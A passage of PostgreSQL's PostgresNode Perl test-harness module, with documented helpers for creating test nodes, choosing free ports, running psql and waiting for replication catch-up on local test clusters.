By default, all nodes use the same PGHOST value. If specified, generate a
PGHOST specific to this node. This allows multiple nodes to use the same
port.
=item install_path => '/path/to/postgres/installation'
Using this parameter it is possible to have nodes pointing to different
installations, for testing different versions together or the same version
with different build parameters. The provided path must be the parent of the
installation's 'bin' and 'lib' directories. In the common case where this is
not provided, Postgres binaries will be found in the caller's PATH.
=back
For backwards compatibility, it is also exported as a standalone function,
which can only create objects of class C<PostgresNode>.
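For example, a sketch of a node running from a separate installation on its
own host address (the installation path is hypothetical):
  my $old_node = PostgresNode->get_new_node('old',
      install_path => '/opt/postgres/11', own_host => 1);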
=cut
sub get_new_node
{
my $class = 'PostgresNode';
$class = shift if scalar(@_) % 2 != 1;
my ($name, %params) = @_;
# Select a port.
my $port;
if (defined $params{port})
{
$port = $params{port};
}
else
{
# When selecting a port, we look for an unassigned TCP port number,
# even if we intend to use only Unix-domain sockets. This is clearly
# necessary on $use_tcp (Windows) configurations, and it seems like a
# good idea on Unixen as well.
$port = get_free_port();
}
# Select a host.
my $host = $test_pghost;
if ($params{own_host})
{
if ($use_tcp)
{
$last_host_assigned++;
$last_host_assigned > 254 and BAIL_OUT("too many own_host nodes");
$host = '127.0.0.' . $last_host_assigned;
}
else
{
$host = "$test_pghost/$name"; # Assume $name =~ /^[-_a-zA-Z0-9]+$/
mkdir $host;
}
}
# Lock port number found by creating a new node
my $node = $class->new($name, $host, $port);
if ($params{install_path})
{
$node->{_install_path} = $params{install_path};
}
# Add node to list of nodes
push(@all_nodes, $node);
$node->_set_pg_version;
my $v = $node->{_pg_version};
carp("PostgresNode isn't fully compatible with version " . $v)
if $v < 12;
return $node;
}
# Private routine to run the pg_config binary found in our environment (or in
# our install_path, if we have one), and set the version from it
#
sub _set_pg_version
{
my ($self) = @_;
my $inst = $self->{_install_path};
my $pg_config = "pg_config";
if (defined $inst)
{
# If the _install_path is invalid, our PATH variables might find an
# unrelated pg_config executable elsewhere. Sanity check the
# directory.
BAIL_OUT("directory not found: $inst")
unless -d $inst;
# If the directory exists but is not the root of a postgresql
# installation, or if the user configured using
# --bindir=$SOMEWHERE_ELSE, we're not going to find pg_config, so
# complain about that, too.
$pg_config = "$inst/bin/pg_config";
BAIL_OUT("pg_config not found: $pg_config")
unless -e $pg_config;
BAIL_OUT("pg_config not executable: $pg_config")
unless -x $pg_config;
# Leave $pg_config install_path qualified, to be sure we get the right
# version information, below, or die trying
}
local %ENV = $self->_get_env();
# We only want the version field
my $version_line = qx{$pg_config --version};
BAIL_OUT("$pg_config failed: $!") if $?;
$self->{_pg_version} = PostgresVersion->new($version_line);
BAIL_OUT("could not parse pg_config --version output: $version_line")
unless defined $self->{_pg_version};
}
# Private routine to return a copy of the environment with the PATH and
# (DY)LD_LIBRARY_PATH correctly set when there is an install path set for
# the node.
#
# Routines that call Postgres binaries need to call this routine like this:
#
#   local %ENV = $self->_get_env(%extra_settings);
#
# A copy of the environment is taken and node's host and port settings are
# added as PGHOST and PGPORT. Then the extra settings (if any) are applied.
# Any setting in %extra_settings with an undefined value is deleted; the
# remainder are set. Then the PATH and (DY)LD_LIBRARY_PATH are adjusted
# if the node's install path is set, and the copy environment is returned.
#
# The install path set in get_new_node needs to be a directory containing
# bin and lib subdirectories as in a standard PostgreSQL installation, so this
# can't be used with installations where the bin and lib directories don't have
# a common parent directory.
sub _get_env
{
my $self = shift;
my %inst_env = (%ENV, PGHOST => $self->{_host}, PGPORT => $self->{_port});
# the remaining arguments are modifications to make to the environment
my %mods = (@_);
while (my ($k, $v) = each %mods)
{
if (defined $v)
{
$inst_env{$k} = "$v";
}
else
{
delete $inst_env{$k};
}
}
# now fix up the new environment for the install path
my $inst = $self->{_install_path};
if ($inst)
{
if ($TestLib::windows_os)
{
# Windows picks up DLLs from the PATH rather than *LD_LIBRARY_PATH
# choose the right path separator
if ($Config{osname} eq 'MSWin32')
{
$inst_env{PATH} = "$inst/bin;$inst/lib;$ENV{PATH}";
}
else
{
$inst_env{PATH} = "$inst/bin:$inst/lib:$ENV{PATH}";
}
}
else
{
my $dylib_name =
$Config{osname} eq 'darwin'
? "DYLD_LIBRARY_PATH"
: "LD_LIBRARY_PATH";
$inst_env{PATH} = "$inst/bin:$ENV{PATH}";
if (exists $ENV{$dylib_name})
{
$inst_env{$dylib_name} = "$inst/lib:$ENV{$dylib_name}";
}
else
{
$inst_env{$dylib_name} = "$inst/lib";
}
}
}
return (%inst_env);
}
# Private routine to get an installation path qualified command.
#
# IPC::Run maintains a cache, %cmd_cache, mapping commands to paths. Tests
# which use nodes spanning more than one postgres installation path need to
# avoid confusing which installation's binaries get run. Setting $ENV{PATH} is
# insufficient, as IPC::Run does not check to see if the path has changed since
# caching a command.
sub installed_command
{
my ($self, $cmd) = @_;
# Nodes using alternate installation locations use their installation's
# bin/ directory explicitly
return join('/', $self->{_install_path}, 'bin', $cmd)
if defined $self->{_install_path};
# Nodes implicitly using the default installation location rely on IPC::Run
# to find the right binary, which should not cause %cmd_cache confusion,
# because no nodes with other installation paths do it that way.
return $cmd;
}
=pod
=item get_free_port()
Locate an unprivileged (high) TCP port that's not currently bound to
anything. This is used by get_new_node, and is also exported for use
by test cases that need to start other, non-Postgres servers.
Ports assigned to existing PostgresNode objects are automatically
excluded, even if those servers are not currently running.
XXX A port available now may become unavailable by the time we start
the desired service.
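For example, a sketch reserving a port for an auxiliary, non-Postgres
server started by the test:
  my $aux_port = get_free_port();
  note "auxiliary server will listen on port $aux_port";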
=cut
sub get_free_port
{
my $found = 0;
my $port = $last_port_assigned;
while ($found == 0)
{
# advance $port, wrapping correctly around range end
$port = 49152 if ++$port >= 65536;
print "# Checking port $port\n";
# Check first that candidate port number is not included in
# the list of already-registered nodes.
$found = 1;
foreach my $node (@all_nodes)
{
$found = 0 if ($node->port == $port);
}
# Check to see if anything else is listening on this TCP port.
# Seek a port available for all possible listen_addresses values,
# so callers can harness this port for the widest range of purposes.
# The 0.0.0.0 test achieves that for MSYS, which automatically sets
# SO_EXCLUSIVEADDRUSE. Testing 0.0.0.0 is insufficient for Windows
# native Perl (https://stackoverflow.com/a/14388707), so we also
# have to test individual addresses. Doing that for 127.0.0/24
# addresses other than 127.0.0.1 might fail with EADDRNOTAVAIL on
# non-Linux, non-Windows kernels.
#
# Thus, 0.0.0.0 and individual 127.0.0/24 addresses are tested
# only on Windows and only when TCP usage is requested.
if ($found == 1)
{
foreach my $addr (qw(127.0.0.1),
($use_tcp && $TestLib::windows_os)
? qw(127.0.0.2 127.0.0.3 0.0.0.0)
: ())
{
if (!can_bind($addr, $port))
{
$found = 0;
last;
}
}
}
}
print "# Found port $port\n";
# Update port for next time
$last_port_assigned = $port;
return $port;
}
# Internal routine to check whether a host:port is available to bind
sub can_bind
{
my ($host, $port) = @_;
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $proto = getprotobyname("tcp");
socket(SOCK, PF_INET, SOCK_STREAM, $proto)
or die "socket failed: $!";
# As in postmaster, don't use SO_REUSEADDR on Windows
setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
unless $TestLib::windows_os;
my $ret = bind(SOCK, $paddr) && listen(SOCK, SOMAXCONN);
close(SOCK);
return $ret;
}
# Automatically shut down any still-running nodes (in the same order the nodes
# were created in) when the test script exits.
END
{
# take care not to change the script's exit value
my $exit_code = $?;
foreach my $node (@all_nodes)
{
$node->teardown_node;
# skip clean if we are requested to retain the basedir
next if defined $ENV{'PG_TEST_NOCLEAN'};
# clean basedir on clean test invocation
$node->clean_node if $exit_code == 0 && TestLib::all_tests_passing();
}
$? = $exit_code;
}
=pod
=item $node->teardown_node()
Do an immediate stop of the node
=cut
sub teardown_node
{
my $self = shift;
$self->stop('immediate');
return;
}
=pod
=item $node->clean_node()
Remove the base directory of the node if the node has been stopped.
=cut
sub clean_node
{
my $self = shift;
rmtree $self->{_basedir} unless defined $self->{_pid};
return;
}
=pod
=item $node->safe_psql($dbname, $sql) => stdout
Invoke B<psql> to run B<sql> on B<dbname> and return its stdout on success.
Die if the SQL produces an error. Runs with B<ON_ERROR_STOP> set.
Takes optional extra params like timeout and timed_out parameters with the same
options as psql.
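For example (the query is only illustrative):
  my $nrows = $node->safe_psql('postgres',
    'SELECT count(*) FROM pg_class');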
=cut
sub safe_psql
{
my ($self, $dbname, $sql, %params) = @_;
local %ENV = $self->_get_env();
my ($stdout, $stderr);
my $ret = $self->psql(
$dbname, $sql,
%params,
stdout => \$stdout,
stderr => \$stderr,
on_error_die => 1,
on_error_stop => 1);
# psql can emit stderr from NOTICEs etc
if ($stderr ne "")
{
print "#### Begin standard error\n";
print $stderr;
print "\n#### End standard error\n";
}
return $stdout;
}
=pod
=item $node->psql($dbname, $sql, %params) => psql_retval
Invoke B<psql> to execute B<$sql> on B<$dbname> and return the return value
from B<psql>, which is run with on_error_stop by default so that it will
stop running sql and return 3 if the passed SQL results in an error.
As a convenience, if B<psql> is called in array context it returns an
array containing ($retval, $stdout, $stderr).
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
stdout and stderr are transformed to UNIX line endings if on Windows. Any
trailing newline is removed.
Dies on failure to invoke psql but not if psql exits with a nonzero
return code (unless on_error_die specified).
If psql exits because of a signal, an exception is raised.
=over
=item stdout => \$stdout
B<stdout>, if given, must be a scalar reference to which standard output is
written. If not given, standard output is not redirected and will be printed
unless B<psql> is called in array context, in which case it's captured and
returned.
=item stderr => \$stderr
Same as B<stdout> but gets standard error. If the same scalar is passed for
both B<stdout> and B<stderr> the results may be interleaved unpredictably.
=item on_error_stop => 1
By default, the B<psql> method invokes the B<psql> program with ON_ERROR_STOP=1
set, so SQL execution is stopped at the first error and exit code 3 is
returned. Set B<on_error_stop> to 0 to ignore errors instead.
=item on_error_die => 0
By default, this method returns psql's result code. Pass on_error_die to
instead die with an informative message.
=item timeout => 'interval'
Set a timeout for the psql call as an interval accepted by B<IPC::Run::timer>
(integer seconds is fine). This method raises an exception on timeout, unless
the B<timed_out> parameter is also given.
=item timed_out => \$timed_out
If B<timeout> is set and this parameter is given, the scalar it references
is set to true if the psql call times out.
=item connstr => B<value>
If set, use this as the connection string for the connection to the
backend.
=item replication => B<value>
If set, add B<replication=value> to the conninfo string.
Passing the literal value C<database> results in a logical replication
connection.
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
e.g.
my ($stdout, $stderr, $timed_out);
my $cmdret = $node->psql('postgres', 'SELECT pg_sleep(600)',
stdout => \$stdout, stderr => \$stderr,
timeout => 180, timed_out => \$timed_out,
extra_params => ['--single-transaction'])
will set $cmdret to undef and $timed_out to a true value.
$node->psql('postgres', $sql, on_error_die => 1);
dies with an informative message if $sql fails.
=cut
sub psql
{
my ($self, $dbname, $sql, %params) = @_;
local %ENV = $self->_get_env();
my $stdout = $params{stdout};
my $stderr = $params{stderr};
my $replication = $params{replication};
my $timeout = undef;
my $timeout_exception = 'psql timed out';
# Build the connection string.
my $psql_connstr;
if (defined $params{connstr})
{
$psql_connstr = $params{connstr};
}
else
{
$psql_connstr = $self->connstr($dbname);
}
$psql_connstr .= defined $replication ? " replication=$replication" : "";
my @psql_params = (
$self->installed_command('psql'),
'-XAtq', '-d', $psql_connstr, '-f', '-');
# If the caller wants an array and hasn't passed stdout/stderr
# references, allocate temporary ones to capture them so we
# can return them. Otherwise we won't redirect them at all.
if (wantarray)
{
if (!defined($stdout))
{
my $temp_stdout = "";
$stdout = \$temp_stdout;
}
if (!defined($stderr))
{
my $temp_stderr = "";
$stderr = \$temp_stderr;
}
}
$params{on_error_stop} = 1 unless defined $params{on_error_stop};
$params{on_error_die} = 0 unless defined $params{on_error_die};
push @psql_params, '-v', 'ON_ERROR_STOP=1' if $params{on_error_stop};
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
$timeout =
IPC::Run::timeout($params{timeout}, exception => $timeout_exception)
if (defined($params{timeout}));
${ $params{timed_out} } = 0 if defined $params{timed_out};
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
$$stderr = "" if ref($stderr);
my $ret;
# Run psql and capture any possible exceptions. If the exception is
# because of a timeout and the caller requested to handle that, just return
# and set the flag. Otherwise, and for any other exception, rethrow.
#
# For background, see
# https://metacpan.org/pod/release/ETHER/Try-Tiny-0.24/lib/Try/Tiny.pm
do
{
local $@;
eval {
my @ipcrun_opts = (\@psql_params, '<', \$sql);
push @ipcrun_opts, '>', $stdout if defined $stdout;
push @ipcrun_opts, '2>', $stderr if defined $stderr;
push @ipcrun_opts, $timeout if defined $timeout;
IPC::Run::run @ipcrun_opts;
$ret = $?;
};
my $exc_save = $@;
if ($exc_save)
{
# IPC::Run::run threw an exception. re-throw unless it's a
# timeout, which we'll handle by testing is_expired
die $exc_save
if (blessed($exc_save)
|| $exc_save !~ /^\Q$timeout_exception\E/);
$ret = undef;
die "Got timeout exception '$exc_save' but timer not expired?!"
unless $timeout->is_expired;
if (defined($params{timed_out}))
{
${ $params{timed_out} } = 1;
}
else
{
die "psql timed out: stderr: '$$stderr'\n"
. "while running '@psql_params'";
}
}
};
# Note: on Windows, IPC::Run seems to convert \r\n to \n in program output
# if we're using native Perl, but not if we're using MSys Perl. So do it
# by hand in the latter case, here and elsewhere.
if (defined $$stdout)
{
$$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp $$stdout;
}
if (defined $$stderr)
{
$$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp $$stderr;
}
# See http://perldoc.perl.org/perlvar.html#%24CHILD_ERROR
# We don't use IPC::Run::Simple to limit dependencies.
#
# We always die on signal.
my $core = $ret & 128 ? " (core dumped)" : "";
die "psql exited with signal "
. ($ret & 127)
. "$core: '$$stderr' while running '@psql_params'"
if $ret & 127;
$ret = $ret >> 8;
if ($ret && $params{on_error_die})
{
die "psql error: stderr: '$$stderr'\nwhile running '@psql_params'"
if $ret == 1;
die "connection error: '$$stderr'\nwhile running '@psql_params'"
if $ret == 2;
die
"error running SQL: '$$stderr'\nwhile running '@psql_params' with sql '$sql'"
if $ret == 3;
die "psql returns $ret: '$$stderr'\nwhile running '@psql_params'";
}
if (wantarray)
{
return ($ret, $$stdout, $$stderr);
}
else
{
return $ret;
}
}
=pod
=item $node->background_psql($dbname, \$stdin, \$stdout, $timer, %params) => harness
Invoke B<psql> on B<$dbname> and return an IPC::Run harness object, which the
caller may use to send input to B<psql>. The process's stdin is sourced from
the $stdin scalar reference, and its stdout and stderr go to the $stdout
scalar reference. This allows the caller to act on other parts of the system
while idling this backend.
The specified timer object is attached to the harness, as well. It's the caller's
responsibility to select the timeout length, and to restart the timer after
each command if the timeout is per-command.
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
Dies on failure to invoke psql, or if psql fails to connect. Errors occurring
later are the caller's problem. psql runs with on_error_stop by default so
that it will stop running SQL and return 3 if the passed SQL results in an error.
Be sure to "finish" the harness when done with it.
=over
=item on_error_stop => 1
By default, the B<psql> method invokes the B<psql> program with ON_ERROR_STOP=1
set, so SQL execution is stopped at the first error and exit code 3 is
returned. Set B<on_error_stop> to 0 to ignore errors instead.
=item replication => B<value>
If set, add B<replication=value> to the conninfo string.
Passing the literal value C<database> results in a logical replication
connection.
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
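For example, a rough sketch of driving a session and waiting for output
(the query and output pattern are only illustrative):
  my ($in, $out) = ('', '');
  my $timer = IPC::Run::timer(180);
  my $h = $node->background_psql('postgres', \$in, \$out, $timer);
  $in .= "SELECT pg_backend_pid();\n";
  $h->pump until $out =~ /\d/ || $timer->is_expired;
  $h->finish;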
=cut
sub background_psql
{
my ($self, $dbname, $stdin, $stdout, $timer, %params) = @_;
local %ENV = $self->_get_env();
my $replication = $params{replication};
my @psql_params = (
$self->installed_command('psql'),
'-XAtq',
'-d',
$self->connstr($dbname)
. (defined $replication ? " replication=$replication" : ""),
'-f',
'-');
$params{on_error_stop} = 1 unless defined $params{on_error_stop};
push @psql_params, '-v', 'ON_ERROR_STOP=1' if $params{on_error_stop};
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
# Ensure there is no data waiting to be sent:
$$stdin = "" if ref($stdin);
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
my $harness = IPC::Run::start \@psql_params,
'<', $stdin, '>', $stdout, $timer;
# Request some output, and pump until we see it. This means that psql
# connection failures are caught here, relieving callers of the need to
# handle those. (Right now, we have no particularly good handling for
# errors anyway, but that might be added later.)
my $banner = "background_psql: ready";
$$stdin = "\\echo $banner\n";
pump $harness until $$stdout =~ /$banner/ || $timer->is_expired;
die "psql startup timed out" if $timer->is_expired;
return $harness;
}
=pod
=item $node->interactive_psql($dbname, \$stdin, \$stdout, $timer, %params) => harness
Invoke B<psql> on B<$dbname> and return an IPC::Run harness object,
which the caller may use to send interactive input to B<psql>.
The process's stdin is sourced from the $stdin scalar reference,
and its stdout and stderr go to the $stdout scalar reference.
ptys are used so that psql thinks it's being called interactively.
The specified timer object is attached to the harness, as well.
It's the caller's responsibility to select the timeout length, and to
restart the timer after each command if the timeout is per-command.
psql is invoked in tuples-only unaligned mode with reading of B<.psqlrc>
disabled. That may be overridden by passing extra psql parameters.
Dies on failure to invoke psql, or if psql fails to connect.
Errors occurring later are the caller's problem.
Be sure to "finish" the harness when done with it.
The only extra parameter currently accepted is
=over
=item extra_params => ['--single-transaction']
If given, it must be an array reference containing additional parameters to B<psql>.
=back
This requires IO::Pty in addition to IPC::Run.
=cut
sub interactive_psql
{
my ($self, $dbname, $stdin, $stdout, $timer, %params) = @_;
local %ENV = $self->_get_env();
my @psql_params = (
$self->installed_command('psql'),
'-XAt', '-d', $self->connstr($dbname));
push @psql_params, @{ $params{extra_params} }
if defined $params{extra_params};
# Ensure there is no data waiting to be sent:
$$stdin = "" if ref($stdin);
# IPC::Run would otherwise append to existing contents:
$$stdout = "" if ref($stdout);
my $harness = IPC::Run::start \@psql_params,
'<pty<', $stdin, '>pty>', $stdout, $timer;
# Pump until we see psql's help banner. This ensures that callers
# won't write anything to the pty before it's ready, avoiding an
# implementation issue in IPC::Run. Also, it means that psql
# connection failures are caught here, relieving callers of
# the need to handle those. (Right now, we have no particularly
# good handling for errors anyway, but that might be added later.)
pump $harness
until $$stdout =~ /Type "help" for help/ || $timer->is_expired;
die "psql startup timed out" if $timer->is_expired;
return $harness;
}
=pod
=item $node->connect_ok($connstr, $test_name, %params)
Attempt a connection with a custom connection string. This is expected
to succeed.
=over
=item sql => B<value>
If this parameter is set, this query is used for the connection attempt
instead of the default.
=item expected_stdout => B<value>
If this regular expression is set, matches it with the output generated.
=item log_like => [ qr/required message/ ]
If given, it must be an array reference containing a list of regular
expressions that must match against the server log, using
C<Test::More::like()>.
=item log_unlike => [ qr/prohibited message/ ]
If given, it must be an array reference containing a list of regular
expressions that must NOT match against the server log. They will be
passed to C<Test::More::unlike()>.
=back
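For example (the test name is only illustrative):
  $node->connect_ok($node->connstr('postgres'),
    'can connect to the postgres database');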
=cut
sub connect_ok
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $connstr, $test_name, %params) = @_;
my $sql;
if (defined($params{sql}))
{
$sql = $params{sql};
}
else
{
$sql = "SELECT \$\$connected with $connstr\$\$";
}
my (@log_like, @log_unlike);
if (defined($params{log_like}))
{
@log_like = @{ $params{log_like} };
}
if (defined($params{log_unlike}))
{
@log_unlike = @{ $params{log_unlike} };
}
my $log_location = -s $self->logfile;
# Never prompt for a password, any callers of this routine should
# have set up things properly, and this should not block.
my ($ret, $stdout, $stderr) = $self->psql(
'postgres',
$sql,
extra_params => ['-w'],
connstr => "$connstr",
on_error_stop => 0);
is($ret, 0, $test_name);
if (defined($params{expected_stdout}))
{
like($stdout, $params{expected_stdout}, "$test_name: matches");
}
if (@log_like or @log_unlike)
{
my $log_contents = TestLib::slurp_file($self->logfile, $log_location);
while (my $regex = shift @log_like)
{
like($log_contents, $regex, "$test_name: log matches");
}
while (my $regex = shift @log_unlike)
{
unlike($log_contents, $regex, "$test_name: log does not match");
}
}
}
=pod
=item $node->connect_fails($connstr, $test_name, %params)
Attempt a connection with a custom connection string. This is expected
to fail.
=over
=item expected_stderr => B<value>
If this regular expression is set, matches it with the output generated.
=item log_like => [ qr/required message/ ]
=item log_unlike => [ qr/prohibited message/ ]
See C<connect_ok(...)>, above.
=back
=cut
sub connect_fails
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $connstr, $test_name, %params) = @_;
my (@log_like, @log_unlike);
if (defined($params{log_like}))
{
@log_like = @{ $params{log_like} };
}
if (defined($params{log_unlike}))
{
@log_unlike = @{ $params{log_unlike} };
}
my $log_location = -s $self->logfile;
# Never prompt for a password, any callers of this routine should
# have set up things properly, and this should not block.
my ($ret, $stdout, $stderr) = $self->psql(
'postgres',
undef,
extra_params => ['-w'],
connstr => "$connstr");
isnt($ret, 0, $test_name);
if (defined($params{expected_stderr}))
{
like($stderr, $params{expected_stderr}, "$test_name: matches");
}
if (@log_like or @log_unlike)
{
my $log_contents = TestLib::slurp_file($self->logfile, $log_location);
while (my $regex = shift @log_like)
{
like($log_contents, $regex, "$test_name: log matches");
}
while (my $regex = shift @log_unlike)
{
unlike($log_contents, $regex, "$test_name: log does not match");
}
}
}
=pod
=item $node->poll_query_until($dbname, $query [, $expected ])
Run B<$query> repeatedly, until it returns the B<$expected> result
('t', or SQL boolean true, by default).
Continues polling if B<psql> returns an error result.
Times out after 180 seconds.
Returns 1 if successful, 0 if timed out.
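For example, a sketch that waits for a standby node to finish promotion
(assumes $standby is a PostgresNode instance):
  $standby->poll_query_until('postgres', 'SELECT pg_is_in_recovery()', 'f')
    or die "timed out waiting for promotion";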
=cut
sub poll_query_until
{
my ($self, $dbname, $query, $expected) = @_;
local %ENV = $self->_get_env();
$expected = 't' unless defined($expected); # default value
my $cmd = [
$self->installed_command('psql'), '-XAt',
'-d', $self->connstr($dbname)
];
my ($stdout, $stderr);
my $max_attempts = 180 * 10;
my $attempts = 0;
while ($attempts < $max_attempts)
{
my $result = IPC::Run::run $cmd, '<', \$query,
'>', \$stdout, '2>', \$stderr;
$stdout =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp($stdout);
$stderr =~ s/\r\n/\n/g if $Config{osname} eq 'msys';
chomp($stderr);
if ($stdout eq $expected && $stderr eq '')
{
return 1;
}
# Wait 0.1 second before retrying.
usleep(100_000);
$attempts++;
}
# The query result didn't change in 180 seconds. Give up. Print the
# output from the last attempt, hopefully that's useful for debugging.
diag qq(poll_query_until timed out executing this query:
$query
expecting this output:
$expected
last actual query output:
$stdout
with stderr:
$stderr);
return 0;
}
=pod
=item $node->command_ok(...)
Runs a shell command like TestLib::command_ok, but with PGHOST and PGPORT set
so that the command will default to connecting to this PostgresNode.
=cut
sub command_ok
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_ok(@_);
return;
}
=pod
=item $node->command_fails(...)
TestLib::command_fails with our connection parameters. See command_ok(...)
=cut
sub command_fails
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_fails(@_);
return;
}
=pod
=item $node->command_like(...)
TestLib::command_like with our connection parameters. See command_ok(...)
=cut
sub command_like
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_like(@_);
return;
}
=pod
=item $node->command_checks_all(...)
TestLib::command_checks_all with our connection parameters. See
command_ok(...)
=cut
sub command_checks_all
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my $self = shift;
local %ENV = $self->_get_env();
TestLib::command_checks_all(@_);
return;
}
=pod
=item $node->issues_sql_like(cmd, expected_sql, test_name)
Run a command on the node, then verify that $expected_sql appears in the
server log file.
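For example, a sketch (the command and pattern are only illustrative, and
rely on log_statement = all as set up by init):
  $node->issues_sql_like(
    [ 'createdb', 'mydb' ],
    qr/statement: CREATE DATABASE mydb/,
    'createdb issues the expected SQL');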
=cut
sub issues_sql_like
{
local $Test::Builder::Level = $Test::Builder::Level + 1;
my ($self, $cmd, $expected_sql, $test_name) = @_;
local %ENV = $self->_get_env();
my $log_location = -s $self->logfile;
my $result = TestLib::run_log($cmd);
ok($result, "@$cmd exit code 0");
my $log = TestLib::slurp_file($self->logfile, $log_location);
like($log, $expected_sql, "$test_name: SQL found in server log");
return;
}
=pod
=item $node->run_log(...)
Runs a shell command like TestLib::run_log, but with connection parameters set
so that the command will default to connecting to this PostgresNode.
=cut
sub run_log
{
my $self = shift;
local %ENV = $self->_get_env();
TestLib::run_log(@_);
return;
}
=pod
=item $node->lsn(mode)
Look up WAL locations on the server:
* insert location (primary only, error on replica)
* write location (primary only, error on replica)
* flush location (primary only, error on replica)
* receive location (always undef on primary)
* replay location (always undef on primary)
mode must be specified.
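For example (assumes $primary and $standby are PostgresNode instances):
  my $insert_lsn = $primary->lsn('insert');
  my $replay_lsn = $standby->lsn('replay');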
=cut
sub lsn
{
my ($self, $mode) = @_;
my %modes = (
'insert' => 'pg_current_wal_insert_lsn()',
'flush' => 'pg_current_wal_flush_lsn()',
'write' => 'pg_current_wal_lsn()',
'receive' => 'pg_last_wal_receive_lsn()',
'replay' => 'pg_last_wal_replay_lsn()');
$mode = '<undef>' if !defined($mode);
croak "unknown mode for 'lsn': '$mode', valid modes are "
. join(', ', keys %modes)
if !defined($modes{$mode});
my $result = $self->safe_psql('postgres', "SELECT $modes{$mode}");
chomp($result);
if ($result eq '')
{
return;
}
else
{
return $result;
}
}
=pod
=item $node->wait_for_catchup(standby_name, mode, target_lsn)
Wait for the node with application_name standby_name (usually from node->name,
also works for logical subscriptions)
until its replication location in pg_stat_replication equals or passes the
upstream's WAL insert point at the time this function is called. By default
the replay_lsn is waited for, but 'mode' may be specified to wait for any of
sent|write|flush|replay. The connection catching up must be in a streaming
state.
If there is no active replication connection from this peer, waits until
poll_query_until timeout.
Requires that the 'postgres' db exists and is accessible.
target_lsn may be any arbitrary lsn, but is typically $primary_node->lsn('insert').
If omitted, pg_current_wal_lsn() is used.
This is not a test. It die()s on failure.
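For example, a typical call (assumes a standby whose application_name is
'standby'):
  $primary->wait_for_catchup('standby', 'replay', $primary->lsn('insert'));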
=cut
sub wait_for_catchup
{
my ($self, $standby_name, $mode, $target_lsn) = @_;
$mode = defined($mode) ? $mode : 'replay';
my %valid_modes =
('sent' => 1, 'write' => 1, 'flush' => 1, 'replay' => 1);
croak "unknown mode $mode for 'wait_for_catchup', valid modes are "
. join(', ', keys(%valid_modes))
unless exists($valid_modes{$mode});
# Allow passing of a PostgresNode instance as shorthand
if (blessed($standby_name) && $standby_name->isa("PostgresNode"))
{
$standby_name = $standby_name->name;
}
my $lsn_expr;
if (defined($target_lsn))
{
$lsn_expr = "'$target_lsn'";
}
else
{
$lsn_expr = 'pg_current_wal_lsn()';
}
print "Waiting for replication conn "
. $standby_name . "'s "
. $mode
. "_lsn to pass "
. $lsn_expr . " on "
. $self->name . "\n";
my $query =
qq[SELECT $lsn_expr <= ${mode}_lsn AND state = 'streaming' FROM pg_catalog.pg_stat_replication WHERE application_name = '$standby_name';];
$self->poll_query_until('postgres', $query)
or croak "timed out waiting for catchup";
print "done\n";
return;
}
=pod
=item $node->wait_for_slot_catchup(slot_name, mode, target_lsn)
Wait for the named replication slot to equal or pass the supplied target_lsn.
The location used is the restart_lsn unless mode is given, in which case it may
be 'restart' or 'confirmed_flush'.
Requires that the 'postgres' db exists and is accessible.
This is not a test. It die()s on failure.
If the slot is not active, will time out after poll_query_until's timeout.
target_lsn may be any arbitrary lsn, but is typically $primary_node->lsn('insert').
Note that for logical slots, restart_lsn is held down by the oldest in-progress tx.
=cut
sub wait_for_slot_catchup
{
my ($self, $slot_name, $mode, $target_lsn) = @_;
$mode = defined($mode) ? $mode : 'restart';
if (!($mode eq 'restart' || $mode eq 'confirmed_flush'))
{
croak "valid modes are restart, confirmed_flush";
}
croak 'target lsn must be specified' unless defined($target_lsn);
print "Waiting for replication slot "
. $slot_name . "'s "
. $mode
. "_lsn to pass "
. $target_lsn . " on "
. $self->name . "\n";
my $query =
qq[SELECT '$target_lsn' <= ${mode}_lsn FROM pg_catalog.pg_replication_slots WHERE slot_name = '$slot_name';];
$self->poll_query_until('postgres', $query)
or croak "timed out waiting for catchup";
print "done\n";
return;
}
=pod
=item $node->query_hash($dbname, $query, @columns)
Execute $query on $dbname, replacing any appearance of the string __COLUMNS__
within the query with a comma-separated list of @columns.
If __COLUMNS__ does not appear in the query, its result columns must EXACTLY
match the order and number (but not necessarily alias) of supplied @columns.
The query must return zero or one rows.
Return a hash-ref representation of the results of the query, with any empty
or null results as defined keys with an empty-string value. There is no way
to differentiate between null and empty-string result fields.
If the query returns zero rows, return a hash with all columns empty. There
is no way to differentiate between zero rows returned and a row with only
null columns.
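For example, a sketch (the view, filter and column list are only
illustrative):
  my $row = $node->query_hash('postgres',
    "SELECT __COLUMNS__ FROM pg_stat_replication WHERE application_name = 'standby'",
    qw(state sent_lsn replay_lsn));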
=cut
sub query_hash
{
my ($self, $dbname, $query, @columns) = @_;
croak 'calls in array context for multi-row results not supported yet'
if (wantarray);
# Replace __COLUMNS__ if found
substr($query, index($query, '__COLUMNS__'), length('__COLUMNS__')) =
join(', ', @columns)
if index($query, '__COLUMNS__') >= 0;
my $result = $self->safe_psql($dbname, $query);
# hash slice, see http://stackoverflow.com/a/16755894/398670 .
#
# Fills the hash with empty strings produced by x-operator element
# duplication if result is an empty row
#
my %val;
@val{@columns} =
